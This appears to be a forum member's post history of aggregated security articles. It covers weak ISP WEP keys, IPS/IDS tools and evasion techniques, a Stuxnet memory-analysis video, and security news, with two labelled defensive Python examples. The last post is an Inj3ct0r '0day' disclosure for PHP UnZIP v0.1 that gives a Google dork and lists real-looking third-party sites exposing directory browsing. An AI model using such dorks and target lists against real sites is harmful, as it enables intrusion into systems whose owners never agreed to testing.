Wubi

Everything posted by Wubi

  1. Nowadays pretty much everyone uses wireless networking, from your smart phone to your home and/or business networks. There are many security issues with wireless networking; the one that I see the most is security carelessness of some ISPs' contractors and installation personnel.

     ISP based WEP Vulnerability: I have noticed from work and personal experience a preventable ISP (Internet Service Provider) based WEP vulnerability that can be prevented through security training in wireless networking on the ISP's end of things. Some ISPs still use the old and unsecure version of WEP (Wired Equivalent Privacy) with an easy to crack password. Can you guess what it is? Still don't know? OK, your phone number associated with your ISP account, which could be entered, as an example, as 3105556666 or 6666555013; that's right, either forward or backward. You're probably asking yourself, why is this insecure? Good question; the answer is simple: most if not all hackers and leechers know the ISPs that use this method of a quick insecure setup, and all it takes is a little cyber tracking to find out all of the phone numbers associated with that address and then try them forward and backward. If a black hat hacker gets into the router, problems can occur, such as being locked out of your router, hijacked internet traffic and even network infiltration, which includes any computers on that network. There is also the risk of ID theft that can come from either the network infiltration or through the cyber tracking part of the attack.

     What is WEP? Wired Equivalent Privacy: WEP is a security protocol based on 64 or 128 bit encryption for your network. It was one of the first wireless encryption protocols. It is extremely unsecure and easily cracked. WEP when it first came out was the start of a great idea, but since then it has been replaced by WPA, which was replaced with WPA2-PSK (WPA2-Personal) and WPA2-Enterprise, which are more secure than WEP. WEP can also be replaced with VPN (Virtual Private Network) and other various protocols.

     ISP Responsibilities: As for the ISPs using this insecure but easy setup, I would like to make a suggestion. Please train your technicians and contractors in cyber security techniques and procedures to prevent unwanted activity on your clientele's wireless networks. I'm not sure if this has become a law yet or not, as I could not find anything on it, but the ISP should be using good risk management procedures, which include training their employees and as such the contractors in wireless and wired security. An ISP's responsibility should be to their clientele's security and well-being, but from what I have seen there are some that have chosen not to make it a priority, and it shows, unfortunately, like an ink blot on a bright white shirt.

     Security Training for ISP Personnel and Contractors: Basic internet users that want to click and go are definitely at risk of this vulnerability and are easily caught up in the ploy by certain ISPs and their contractors. I ask that you the reader please do not get my words wrong; this is not a conspiracy to hurt certain ISPs' consumers but rather a lack of security training and knowledge. This brings me to my main point of ISPs training their field crews as well as using contractors trained in security procedures so as to secure their clientele's home and business wireless and wired networks. Where I live we have three main ISPs, two of which use the much more secure WPA2-PSK encryption protocols. For these two ISPs the encryption key is on the wireless router itself, but for the third, the contractors they use don't understand the security ideology behind the WEP, WPA, WPA2-Personal, or the WPA2-Enterprise based encryption. I have heard many stories from different clientele as well as a personal experience before I got into the security game. In all of the accounts the story is much the same as the next; what they have heard from the contractor for this ISP is that "the WEP key used is just to log on to the internet service, which is why the telephone number is used". This is true in a sense but in all reality highly unsecure; the real reason for using an encryption key such as WEP, WPA, WPA2-Personal, or WPA2-Enterprise is to keep unauthorized individuals from using your wireless signal to gain access to the internet and your network. I am not trying to say the ISP or its employees are evil black hat lovers but just the opposite; they are more like an average user who just wants to get up and go and is not concerned about security. This is where security training for the contractor installation personnel as well as the ISP installation personnel would really pay off in the long run. First, the misconception of the WEP encryption key would be stopped. Second, the user could be instructed in basic wireless security procedures. Third, the user's home or business network would be a lot safer than it would be if the ISP were not to train their contractors and personnel.

     Why is using WEP inadvisable, especially with a key as simple as the user's phone number? Well, WEP is one of the oldest versions of encryption for a wireless network and has since become easily cracked by both leechers and hackers alike. Some people may say that hackers are in it for the challenge; why would they waste their time with a simple WEP crack, especially if they know the ISP uses the user's phone number? At this time I would like to welcome you to the "lifestyles of the hackers of cyber tracking". What is cyber tracking and how can it be used to find a WEP key? Well, cyber tracking is kind of like stalking your prey in the field, but instead of attacking them right off you get to learn everything about them, from the public information to the very deep secrets of the users. That's the challenge.

     How to stop the Leechers! You may ask, what are the symptoms of someone leeching off my network? The symptoms for the network can be the same as a network aware worm such as Conficker, SQL Slammer or IRC bots: minor to major network slowdown (this all depends on how many leeches you have connected to your wireless network), unknown IP addresses showing up in the router logs, and on rare occasions, if you get too many leeches, the network may crash. If you have one leech on your network it's guaranteed that there are more around sucking the bandwidth from the network. You may be asking, why are they called leeches? The answer is simple: in swamps there are little worm like creatures called leeches that attach themselves to your skin and suck your blood; they are also used as a natural blood letting solution to get rid of an infection. As with the worm like leeches, internet leeches also drain you of precious bandwidth should they attach themselves to your network. Usually a leech is an individual that wants the internet but refuses to pay for internet services. It could be a teenager up to an adult that wants to get free internet.

     WEP vs. WPA2-Personal Question: Here is a fun question for the readers of this post; I would love to see what you ladies and guys have to say about this. If a hacker were to choose a wireless hit to gain access to a target system, which one do you think they would want to hit and why?

     Source: InfoSec Resources – Protect Your Wireless Network from Leechers and Hackers
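     The post above makes two defender-side points: a WEP network keyed with the customer's phone number is guessable, and unknown devices in the router's logs are the symptom of a leech. The following Python script is an added example, not code from the original post or from InfoSec Resources; it audits a wireless security configuration for exactly those weaknesses and then scans a few constructed DHCP lease lines for devices missing from an allowlist. The log format, the MAC addresses and the allowlist are assumptions made for the demonstration, and the 10-digit phone-number check reflects the North American numbers used in the post.

```python
"""Two defender-side checks for the issues in the post above: a WEP network
keyed with a phone number, and unknown devices ("leeches") in router logs.

Added example, not code from the original post. The log format, MAC addresses
and allowlist below are constructed for the demonstration.
"""
import re
from dataclasses import dataclass

INSECURE_MODES = {"WEP", "OPEN"}                      # no real confidentiality
ACCEPTED_MODES = {"WPA2-PSK", "WPA2-ENTERPRISE", "WPA3-PSK", "WPA3-ENTERPRISE"}


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    message: str


def looks_like_phone_number(key: str) -> bool:
    """True when the key, stripped of separators, is a 10-digit string: the shape
    of the North American phone numbers the post describes, forward or reversed."""
    digits = re.sub(r"[\s\-().]", "", key)
    return digits.isdigit() and len(digits) == 10


def audit_wifi_config(mode: str, key: str) -> list:
    """Return findings for a wireless security mode and its key/passphrase."""
    findings = []
    mode_u = mode.upper()
    if mode_u in INSECURE_MODES:
        findings.append(Finding("high", f"{mode} provides no meaningful protection; "
                                        "use WPA2-PSK or WPA2-Enterprise"))
    elif mode_u not in ACCEPTED_MODES:
        findings.append(Finding("medium", f"unrecognised security mode {mode!r}; "
                                          "verify it is WPA2 or newer"))
    if looks_like_phone_number(key):
        findings.append(Finding("high", "key is a 10-digit number; phone-number keys "
                                        "are guessable from public records"))
    if key.isdigit():
        findings.append(Finding("medium", "key is digits only; mix letters, digits and symbols"))
    if len(key) < 12:
        findings.append(Finding("medium", f"key is only {len(key)} characters; "
                                          "use a long random passphrase"))
    return findings


# Constructed DHCP lease lines in a dhcpd-like format (real routers vary).
ROUTER_LOG = """\
Jul 26 19:02:11 router dhcpd: DHCPACK on 192.168.1.10 to a4:5e:60:11:22:33 (laptop-home)
Jul 26 19:04:52 router dhcpd: DHCPACK on 192.168.1.11 to 00:26:08:aa:bb:cc (iphone)
Jul 26 21:13:40 router dhcpd: DHCPACK on 192.168.1.37 to 7c:dd:90:de:ad:01 (android-3f9)
Jul 26 21:13:41 router dhcpd: DHCPACK on 192.168.1.38 to 7c:dd:90:de:ad:02 (android-77c)
"""
KNOWN_DEVICES = {"a4:5e:60:11:22:33", "00:26:08:aa:bb:cc"}   # constructed allowlist

LEASE_RE = re.compile(r"DHCPACK on (\S+) to ([0-9a-fA-F:]{17}) \(([^)]*)\)")


def unknown_clients(log_text: str, known: set) -> list:
    """Return (ip, mac, hostname) for every lease handed to a device not on the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LEASE_RE.search(line)
        if m and m.group(2).lower() not in known:
            hits.append((m.group(1), m.group(2).lower(), m.group(3)))
    return hits


if __name__ == "__main__":
    for f in audit_wifi_config("WEP", "3105556666"):
        print(f"[{f.severity}] {f.message}")
    for ip, mac, name in unknown_clients(ROUTER_LOG, KNOWN_DEVICES):
        print(f"unknown device {mac} ({name}) was leased {ip}; not on the allowlist")
```

     Run against the phone-number WEP setup the post describes, the audit reports the mode and the key shape as high-severity findings; the lease scan flags the two Android devices that no one in the household recognises, which is the "unknown IP addresses in the router logs" symptom the post lists.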
  2. Description: In this video you will learn how to attack a computer using different techniques and backdoors. So in this video he will cover all the great attacks like:
     • ARP Poisoning
     • DNS spoofing
     • Network Sniffing
     • Building an illicit server
     • Dropping Malicious Payloads
     • Attacking The WLAN
     • Hash Cracking with JTR
     • Advance Linux command line
     • Advance Metasploit options
     • Auto-pwnage with Metasploit resource scripts
     • Maintaining the "Man-in-the-Middle" position
     etc.

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  3. Description: In this video you will learn how to analyze the Stuxnet worm using a tool called Volatility.

     Volatility: The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

     Stuxnet: Stuxnet is a computer worm; the malware was found in June 2010. This worm targets only Microsoft Windows. Hackers created Stuxnet for attacking industrial systems.

     Stuxnet - Wikipedia, the free encyclopedia
     https://www.volatilesystems.com/default/volatility

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  4. Nationwide customers hit by double-debit glitch | ZDNet

     Summary: Money has been taken twice from an as-yet unknown number of Nationwide customers' accounts, according to reports on Twitter. Nationwide is investigating the issue.

     By Tom Espiner | July 26, 2012 -- 12:17 GMT (05:17 PDT)

     A technical problem with Nationwide debit transactions has seen some money taken twice from customer accounts, according to complaints on Twitter. Nationwide admitted on Twitter that customers were having debit transaction problems, but had not indicated the scale of the glitch at the time of writing.

     Nationwide is looking into reports of a glitch that has seen money taken twice from some customer accounts. Image credit: Nationwide

     "We are aware of debit card transaction issues affecting only some of our customers," a Nationwide spokeswoman told ZDNet on Thursday. Nationwide is working to resolve the issue as soon as it can, the spokeswoman added. A number of organisations and individuals took to Twitter to report incidents. Payments made over the last three days may have been taken twice, SME support organisation Cambridgeshire Business Support said in a tweet. The Nationwide problems come a month after competitors RBS, Natwest and Ulster Bank were hit by a batch-processing glitch.

     Source: Nationwide customers hit by double-debit glitch | ZDNet
  5. Security nous lacking in cloud app development | ZDNet

     Summary: Hewlett-Packard exec says developers' poor grasp of security practices when building cloud-based enterprise software could lead to code having loopholes hackers can exploit.

     By Jamie Yap | July 26, 2012 -- 10:53 GMT (03:53 PDT)

     The maturing cloud computing trend has spurred more enterprise applications to be built for access via the cloud network, but one Hewlett-Packard executive argues that developers have yet to evolve in tandem with regard to putting security at the forefront of their processes. Matt Bertram, chief technologist of software at HP Asia-Pacific and Japan, pointed out that coding a secure app for enterprise use is both a challenge to overcome and a major pitfall to avoid for many IT departments. Developers of traditional enterprise software obviously have coding knowhow, but many may not be aware of security best practices for cloud-based applications and this may leave loopholes in the code that hackers may exploit, he said in an interview on Thursday.

     Bertram noted that security is an oft-quoted concern among companies as to why they have no plans to migrate to the cloud. So this lack of awareness of cloud-based security on the developers' end is all the more pressing, particularly with hackers seemingly moving from attacking corporate networks to targeting the applications themselves, he explained. With cloud computing thrown into the software development mix, he acknowledged that coding becomes more complex. Security comes in multiple levels and would move away from just securing the network perimeter to focusing on how to safeguard the application from external threats, he said. The core elements of app development, such as performance, quality, resilience, and security remain the same, but ensuring these are not compromised becomes ever more important when developing an app for a cloud environment, the HP executive stressed. This is because such apps would be more visible and exposed than internal ones, and should breaches occur, the negative impact on the business would be seen and felt more keenly, he explained. Furthermore, for apps with "cloud-bursting" capabilities, developers would need to build apps that are "smarter" and selective in matching infrastructure resources with the business activities' needs, he noted. Cloud bursting generally refers to an application tapping additional compute power--either from reserve internal resources or from third-party public cloud providers--after existing capacity provisioned for the software has been exhausted.

     Vigilant code checking, testing important

     This is why it is important to implement security measures early on during the code writing stage, as well as carry out security testing or troubleshooting earlier in the application lifecycle, Bertram suggested. Increasing one's security awareness does not mean just writing good code, but being able to identify and correct badly written code at earlier stages too, the HP executive said. The IT vendor, for one, has tools that can help scan the code of enterprise applications to weed out poorly written parts that increase the likelihood of a security breach, he added. He also called on developers to increase their collaboration with the security community, which would help them in writing their apps more securely. All said, Bertram believes enterprises will increasingly pay attention to designing applications that are optimized for the cloud, given that more of them have finished virtualizing their IT infrastructure. "It's a logical progression. After infrastructure has been sorted with virtualization, automation, and self-service, the game now is building and delivering innovation to the business via applications," he stated.

     Source: Security nous lacking in cloud app development | ZDNet
  6. Carly Rae Jepsen nude photos stolen by hackers | Naked Security

     by Anna Brading on July 26, 2012

     # Hey, i don't know you
     And this is crazy
     But i've nicked your photos
     I've hacked you baby #

     Carly Rae Jepsen - yes, her of the "Call Me Maybe" (potentially one-hit-wonder) song-of-the-year-so-far - has lodged a complaint to the Vancouver Police Department after allegedly having naked photos stolen from her personal computer. According to TMZ, Jepsen went to the Vancouver Police Department about a possible hacking situation back in March. Const. Lindsey Houghton from the Vancouver Police Department confirmed: "We began an investigation. That investigation is into the unauthorized use of a computer, theft of telecommunications and the criminal harassment of Miss Jepsen." "At this time, one suspect — an adult male — has been identified. He has not been arrested, he has not been charged and the investigation is continuing."

     Poor old Carly, it was only on Monday when she took to Twitter to deny that a sex video of someone who looked remarkably like her was actually, in fact, not her. "Crazy morning. Discovered that someone put up a sex tape claiming to be me. Ridiculous. Obviously not me." And now she joins the likes of Scarlett Johansson, Mila Kunis, Christina Aguilera, Lady Gaga and Miley Cyrus who have also all fallen victim to cybercriminals. Celebrities may have chosen to be in the public eye, but they deserve some level of privacy, especially when it comes to private files stored on their personal computers. But, like the rest of us, they are capable of being a bit neglectful when it comes to computer security. So, celebrities, if you're reading this - if you must take naked pictures of yourself, at least store them securely. Or perhaps take the advice that we gave Mila Kunis.

     Source: Carly Rae Jepsen nude photos stolen by hackers | Naked Security
  7. Facebook to offer bug bounty to hackers who find flaws in its systems | ZDNet

     Summary: Several companies already reward 'white hat' hackers who responsibly report flaws in their web services, but Facebook is apparently going a step further with payments to those who find vulnerabilities in their internal systems.

     By David Meyer | July 26, 2012 -- 08:58 GMT (01:58 PDT)

     Facebook and Google have for some time offered bounties to hackers who find vulnerabilities in their public-facing systems, but now the social network has gone a step further by offering to reward hackers who find and report flaws in Facebook's corporate network. According to a Bloomberg report on Thursday morning, the move will be announced at the DefCon hacking conference. "If there's a million-dollar bug, we will pay it out," Facebook security response chief Ryan McGeehan was quoted as saying.

     The idea of a company paying so-called 'white hat' hackers to probe their sites and report flaws — rather than exploiting them — is rare, but far from new. Google and Facebook do it, as do Mozilla, HP and, as of last month, PayPal. However, rewarding people for breaking into internal systems is an even riskier proposition. According to the Bloomberg piece, Facebook was moved to introduce the new bounty scheme after an external researcher informed the company of a flaw that meant outsiders could listen in to their internal conversations.

     Facebook's bug bounty page says the company will pay a minimum of $500 for each responsible disclosure, as long as the bug could "compromise the integrity of Facebook user data, circumvent the privacy protections of Facebook user data, or enable access to a system within Facebook's infrastructure". The only kinds of bugs that Facebook won't pay out for are those in third-party apps or websites, denial-of-service vulnerabilities, and spam or social engineering techniques, none of which Facebook has any control over.

     Source: Facebook to offer bug bounty to hackers who find flaws in its systems | ZDNet
  8. July 26, 2012 By Mayuresh

     Our first post regarding the Volatility Framework can be found here. An update – Volatility Framework version 2.1 RC3 – was released a few hours ago!

     Changes made to Volatility Framework:
     • Prevent the 'NoneObject as string' warning when using regex with dlldump and moddump.
     • Added pas2vas for linux and windows.
     • Added tests for Volatility Framework PFN modules.
     • Started implementing yara discontiguous scanner.
     • Fixed some Vad info bugs in the Volatility Framework.
     • Added a single binary memory imager console application which unpacks the correct driver and takes an image.
     • Fixed vaddump to write sparse output files in order to handle extremely huge vad mappings with no backing (see issue 306).
     • Add a Length property to MMVAD to reduce confusion over the purpose of vad.End and minimize the chance of off-by-one errors when calculating vad lengths.
     • Add scudette's BaseYaraScanner, VadYaraScanner, and DiscontigYaraScanner to malfind.py. This fixes yarascan on x64 kernelmode. The EPROCESS.get_vads() API changes a bit. It results in greater speed when using ldrmodules because only the first 2 bytes are needed instead of the whole vad region. Also a new method VADDump.dump_vad is added which aims to write vads to a file in small chunks rather than building a large buffer in memory, which can exhaust/consume the analysis system's RAM.
     • Make sure we don't use the same variable for different things in malfind BaseScanner.
     • Apply a remedy for issue 306 – vaddump on wow64 processes with MM_MAX_COMMIT. We don't want to dump these multi-terabyte ranges with no valid pages.
     • Bring back the ability for malfind to ignore VADs whose entire region is either unavailable due to paging or all 0's… this was lost in r2077 because we avoided reading the entire range into memory at once.
     • Fix an off-by-one error in the impscan plugin. Use the new vad.Length property added in r2076.
     • Add a comment to yarascan which explains why module lookups will fail when operating in kernelmode on x64. It'll be a known issue of the plugin for 2.1, after which time we'll update trunk's Pointer.v() and be able to test more thoroughly before a release.
     • Added command line argument parsing for backwards compatibility with the old Volatility Framework.
     • Added threadscan and modscan again.
     • Added tests for yarascan.
     • Ported the netscan module to the new Volatility Framework.
     • Updated documentation to winpmem binary and cleaned up the code a bit.
     • Removed empty directory.
     • Until we can fix the Pointer.v() 48-bit truncation globally, fix the yarascan module resolution on x64 by supplying it with a private version of find_module that does the truncation.
     • Bump to rc3 because of the Pointer.v() fix for yarascan.

     Download Volatility Framework: Volatility Framework 2.1 RC3 - volatility-2.1-rc3.tar.gz/volatility-2.1_rc1.win32.exe

     Source: Volatility Framework 2.1 version RC3! — PenTestIT
  9. In the past few years, advancements in technology have grown hand in hand with a substantial increase in hacking and cyber espionage. The whole world is deeply interconnected through the medium of the Internet, and one vulnerable machine can be the gateway to a series of undesirable events. The motivation for such events could be anything from financial gain, to political statements, or simply for fun. But for the victim of such an attack, it might cause a much more significant loss than intended. For example, a technology company whose website is successfully hacked results in the loss of reputation, which is certainly very crucial for any company. Enterprises, governments, and even individuals face this problem on a daily basis without knowing how to deal with it. So what is a solution that could help considerably reduce, if not eradicate, this threat? The answer is the implementation of an intrusion prevention system (IPS). An IPS can be understood as a security mechanism that monitors a network and/or system for any malicious action and tries to prevent it. As explained on Wikipedia (Intrusion prevention system - Wikipedia, the free encyclopedia) the core functions of an IPS are: Identify malicious activity Log information related to such activity Attempt to block/stop such activity Report the activity Often, an intrusion prevention system (IPS) is confused with an intrusion detection system (IDS), but in reality an IPS can be considered an extension of IDS. They do have some features in common like traffic monitoring, observing system activity, creating log etc., but what makes an IPS different from an IDS is the IPS’s ability to prevent/block any detected intrusion attempt. Differences between IPS and IDS: IPS It provides an active prevention security solution. An IPS sits in-line with the network traffic flow. Core function is to prevent an intrusion. An IPS slows down the traffic (analysis time). 
Example: SNORT IDS It provides a passive detection security solution. An IDS generally does not sit in-line (although it can) with the network traffic flow. Primary purpose is monitoring and reporting of any malicious activity. An IDS does not affect the traffic. Example: OSSEC HIDS Because of the services provided by an IPS, it is also known as an intrusion detection and prevention system (IDPS). Basically, an IPS sits in-line with the network traffic and monitors it. Through analysis of intrusion signatures, generic behavior, and heuristic methods, it looks out for any malicious action on the network/system and takes the appropriate action of dropping the packet and/or blocking the specific traffic. It further sends an alert to the administrator when any such event occurs. Intrusion prevention systems can be classified as: Network intrusion prevention system (NIPS): This type of IPS is placed at specific point(s) on the network to monitor the entire network for any malicious traffic and attempts to stop it. Host intrusion prevention system (HIPS): A host intrusion detection system is implemented on individual hosts (or devices) to monitor the inbound and outbound traffic for that specific host/device and perform the required action after detecting any malicious activity. Network behavior analysis (NBA): This kind of IPS inspects the traffic for suspicious or unusual flow that could lead to an attack like DoS/DDoS. Wireless intrusion prevention system (WIPS): This monitors the wireless network for malicious behavior. Some common types of threats that an IPS usually is capable of handling: DoS/DDoS attack: An attack that aims to make a service unusable for legitimate users by flooding the service with a huge number of connection requests. ARP spoofing/poisoning: ARP stands for address resolution protocol, which is utilized to find a MAC address when the IP is known in a local network. 
If successful, this kind of attack allows the attacker to intercept all the traffic between two hosts. SSL evasion: Most new IPSs are capable of stopping attacks on the SSL protocol. Port scanning: Generally IPSs are capable of stopping any attempt to find which ports are open on specific hosts. OS fingerprinting: During the recon phase of an attack, one of the most important tasks is to identify a target machine’s operating system so that specific exploits can be launched to compromise that machine. Modern IPSs are capable of detecting and stopping any such attempt. Buffer overflow: This is one of the most widely exploited attacks that can lead to total system compromise. This can be handled by an advanced IPS. An IPS generally utilizes the follow detection methods: Signature based threat detection: An IPS contains a huge repository of attack signatures from known exploit/vulnerability patterns and utilizes these to detect any attempt at intrusion. If a match is found based on the signature, suitable action is taken by the IPS to prevent the attack. Anomaly based threat detection: This detection method uses the baseline established by average network traffic conditions and compares current traffic conditions with that baseline to identify any abnormal or unsafe behavior. If any such activity is found, the IPS takes the appropriate action to safeguard against it. This technique can provide a defense against unknown threats. Stateful protocol analysis detection: This methods looks out for difference in the protocol states as compared to standard predefined profile. Passive monitoring: In this technique the IPS simply sits and monitors abnormal or suspicious behavior, such as unusual amount of traffic from the same IP address (attempt of DoS), and takes the required action against it. An IPS must not be confused or mistaken as a substitute for another network security measure, namely: the firewall. 
The job of a firewall is to limit access to a network/system, and it is generally not capable of detecting and preventing an intrusion. Firewalls basically work based on filtering rules, whereas an IPS uses signature-based threat-detection (and many other techniques) to safeguard the network/system. A firewall’s job is to allow or block traffic, whereas an IPS’s job is to determine if there is something malicious in the traffic allowed by the firewall. An IPS is usually deployed behind a firewall on a network. Neither of these two tools should be considered a replacement for the other; instead, they must be deployed in conjugation with each other to implement defense in depth. Some of the best tools of the trade are described below: The first free and open source NIDPS (network intrusion detection and prevention system) is called as Snort. Originally released by Martin Rosh (Sorcefire founder and CTO) in 1998, Snort has become one of the most deployed IDPS. Snort can perform real time analysis of the traffic and logging of the packets on an IP network. It analyses the protocol, searches/matches the content, and is capable of detecting different kinds of attacks described earlier in the article (port scanning, OS fingerprinting, buffer overflow, etc.). The latest version of the application can be downloaded from http://www.snort.org/snort-downloads/. Figure 1 shows a standard example of the Snort interface. Figure 1. Snort Interface Snort has three primary uses: Packet sniffer: Read and display network packets. Packet logger: Logs the packets to the disk, which can be used for network traffic debugging. Intrusion prevention system (IPS): Monitors and analyses the traffic based on the predefined rule-set and performs the specified action. Snort rules are at the core of the detection of any intrusion attempt. They can be defined as: The approach to perform detection. 
Snort rules are defined based on vulnerabilities, unlike signatures, which are based on exploits and can be bypassed by modifying the exploit. Figure 2 shows the output of the packet dump mode.

Figure 2. Snort packet dump output

Next in the list is another free and open source tool called OSSEC. OSSEC is a host-based intrusion detection system, but that's not all; it also contains aspects of a log monitor and a security information and event manager (SIM/SIEM), which makes it a unique tool in its arena. A security event manager can be understood as a tool used on a huge data network with the aim of centralizing the storage and interpretation of the events/logs generated by other applications. OSSEC is capable of performing:
- Log analysis
- Registry monitoring
- File integrity checking
- Rootkit detection
- Real-time alerting
- Active response

OSSEC can easily be implemented across multiple platforms such as Linux, Mac, Windows, BSD, VMware ESX, etc. OSSEC has a cross-platform architecture that allows it to monitor and manage multiple systems easily through a centralized management server. It can easily be integrated with an existing system to perform centralized event reporting. Figure 3 shows the initiation of OSSEC.

Figure 3. OSSEC initiation

OSSEC contains a manager, which is the center of the deployment. It stores and performs all the functions and hence acts as a server. Agents are installed on the machines that need to be monitored. Agents send information in real time to the manager for analysis. OSSEC also allows integrity checks to be performed on devices that do not allow installation of the agent, such as routers, firewalls, etc. OSSEC agents can also be installed on a virtual machine (VMware ESX) and can help monitor the virtualization platform. Figure 4 displays the output log.

Figure 4. OSSEC output log

Last in the list is Honeyd, which is also an open source program. It is not actually an IPS/IDS but a honeypot which allows its user to set up virtual hosts. These virtual hosts can act as decoys for attackers and distract them from legitimate systems. They can also help to catch attackers after distracting them from the intended target. Figure 5 shows the Honeyd interface. Honeyd in action is displayed in Figure 6.

Figure 5. Honeyd interface
Figure 6. Honeyd in action

Some IPS/IDS evasion techniques, as explained on Wikipedia (Intrusion detection system evasion techniques - Wikipedia, the free encyclopedia), are:
- Obfuscating attack payload: encoding the payload of the attack in a manner such that the target machine will be able to reverse it but the IPS/IDS will not.
- Polymorphic code: creating the same attack in different (unique) forms so that the IPS/IDS does not detect it.
- Packet fragmentation: breaking the attack payload into many small packets so that the IPS/IDS is not capable of reassembling them to detect the attack.
- Overlapping fragments: crafting a series of packets with overlapping TCP sequence numbers.
- Traffic insertion at the IPS/IDS: sending packets crafted with a TTL (time to live) such that they only reach the IDS/IPS.
- Denial of Service/Distributed Denial of Service (DoS/DDoS): by exploiting a vulnerability/bug, the IPS/IDS can be flooded with traffic, overloading all its computational resources and making it unusable.

One tool that needs to be mentioned here is fragroute. Fragroute is a tool that is capable of intercepting, modifying, and rewriting outbound traffic for a specified host. The capabilities of this tool make it one of the standard tools used for IPS/IDS evasion. The latest version of the tool (i.e. fragroute-1.2.5-ipv6) is compatible with IPv6 networks. The tool can be downloaded from Downloads - fragroute-ipv6 - ipv6-enabled fragroute - Google Project Hosting. The non-IPv6 version can be found at fragroute. Figure 7 shows the fragroute interface.

Figure 7. Fragroute interface

Conclusion: Today there are many technologies present in the market designed to safeguard systems/networks from being attacked and to prevent data loss. From firewalls to anti-virus to encryption systems etc., there are many protective measures we can use to hide our precious data. Yet even with the plethora of security technology, we have to face intrusion events and worry about our data being stolen. The main source of such occurrences is the lack of awareness among common people and even among the people who are supposed to look after our data. People confuse different security measures and consider one a substitute for another, which can lead to data compromise. Intrusion detection and prevention systems provide us with the first line of defense against malicious intruders. We must not consider an IPS a substitute for an IDS (it's a different case if the same tool provides all the functions of both tools). IPS and IDS provide the control and visibility required by any enterprise to protect its infrastructure from being attacked and taken over. One of the most important factors to take into consideration when utilizing an IPS/IDS is proper inclusion into the infrastructure through deployment. Improper deployment will lead to a huge slowdown of the network and improper management.

Some best practices that should be followed regarding IPS/IDS:
- Identify and prioritize risk areas for proper deployment.
- Ensure complete coverage of the network.
- Plan an appropriate incident response in case an intrusion is detected.
- Awareness and training for the staff.

Sursa: InfoSec Resources – Intrusion Prevention System: First Line of Defense
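The "overlapping fragments" technique in the evasion list above works because different TCP/IP stacks resolve a byte that two fragments both claim in different ways, and an IDS that guesses one policy sees a different payload than the host. The following is an added example written for this page, not code from the InfoSec Resources article or from fragroute; the fragment stream, the policy names "favor_old" and "favor_new", and the simplified reassembly rules are constructed for illustration (real stacks have several more policies).

```python
# Added example: why overlapping fragments are an IDS evasion technique.
# Two simplified reassembly policies are modelled; the sample fragment
# stream and policy names are constructed, not taken from the article.
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Fragment:
    offset: int    # byte offset of this chunk within the reassembled payload
    data: bytes    # chunk contents; list order below is arrival order


def reassemble(fragments: List[Fragment], policy: str) -> bytes:
    """Reassemble fragments into one payload.

    policy="favor_old": keep the first byte seen at each offset.
    policy="favor_new": a later overlapping fragment overwrites earlier bytes.
    An IDS that applies one policy blindly disagrees with hosts using the other.
    """
    if policy not in ("favor_old", "favor_new"):
        raise ValueError(f"unknown policy {policy!r}")
    buf: Dict[int, int] = {}
    for frag in fragments:                      # process in arrival order
        for i, byte in enumerate(frag.data):
            pos = frag.offset + i
            if policy == "favor_old" and pos in buf:
                continue                        # first writer wins
            buf[pos] = byte                     # last writer wins
    length = max(buf) + 1 if buf else 0
    if any(pos not in buf for pos in range(length)):
        raise ValueError("hole in fragment stream; cannot reassemble")
    return bytes(buf[pos] for pos in range(length))


def conflicting_overlap(fragments: List[Fragment]) -> bool:
    """True when two fragments cover the same offset with different bytes.

    This is the condition a detection engine should alert on, or normalise
    before inspection, instead of silently picking one interpretation."""
    seen: Dict[int, int] = {}
    for frag in fragments:
        for i, byte in enumerate(frag.data):
            pos = frag.offset + i
            if pos in seen and seen[pos] != byte:
                return True
            seen.setdefault(pos, byte)
    return False


# Constructed sample: an innocuous request is sent first, then a second
# fragment overlaps its tail with a different file name.
SAMPLE = [
    Fragment(0, b"GET /cgi-bin/good.sh"),
    Fragment(13, b"evil.sh"),
]

if __name__ == "__main__":
    for policy in ("favor_old", "favor_new"):
        print(policy, reassemble(SAMPLE, policy))
    print("conflicting overlap:", conflicting_overlap(SAMPLE))
```

With "favor_old" the stream reassembles to the harmless request, with "favor_new" to the attack; a sensor that only tried the first policy would pass the second. The practical check is conflicting_overlap(): any stream where two fragments disagree about a byte is itself worth an alert, whatever the payload says.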
10. <><>--| INFO |--<><>
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : PHP UnZIP v0.1 - Full Disclosure
Vendor : PHP UnZIP v0.1
URL Vendor : PHP Concept (http://phpconcept.com/)
Google Dork : intext:"PHP UnZIP v0.1" or inurl:unzip.php?dir=/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase

Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[x] Official Website: http://www.1337day.com
[x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com
I'm Taurus Omar, Member From Inj3ct0r TEAM

| C _:_ A | PHP UnZIP v0.1 - Full Disclosure | C _:_ A |

+----------------| ABOUT ME |--------------------+
NAME: TAURUS OMAR
LINE: INDEPENDENT SECURITY RESEARCHER
HOME: ACCESOILEGAL.BLOGSPOT.COM
TWITTER: @omartaurus
E-MAIL: omar-taurus[at]dragonsecurity[dot]org
E-MAIL: omar-taurus[at]live[dot]com
PWNED: #ZUUUUUUUUUU
+------------------------------------------------+

<><>--| SAMPLE |--<><>
http://inforchile.cl/unzip.php?dir=/
http://www.websites4testing.com/unzip.php?dir=/
http://test.designschemers.com/schemerspress/unzip.php?dir=/
http://www.townsendsorghum.com/shop/images/unzip.php?dir=/var/softaculous
http://mviet.comeze.com/unzip.php?dir=/home/a3642042
http://clients.reederweddings.com/ordersystem/galleries/unzip.php?dir=/
http://rezarss.com/unzip/unzip.php?dir=/home

----------------- GREETZ -----------------------
- 0X004N1 TEAM ALL MEMBERS -
- MR.PACK - MROBERTS - UR0B0R0X - NEPTHYS BLESS -
- http://0x004n1.16mb.com/ -
------------------------------------------------
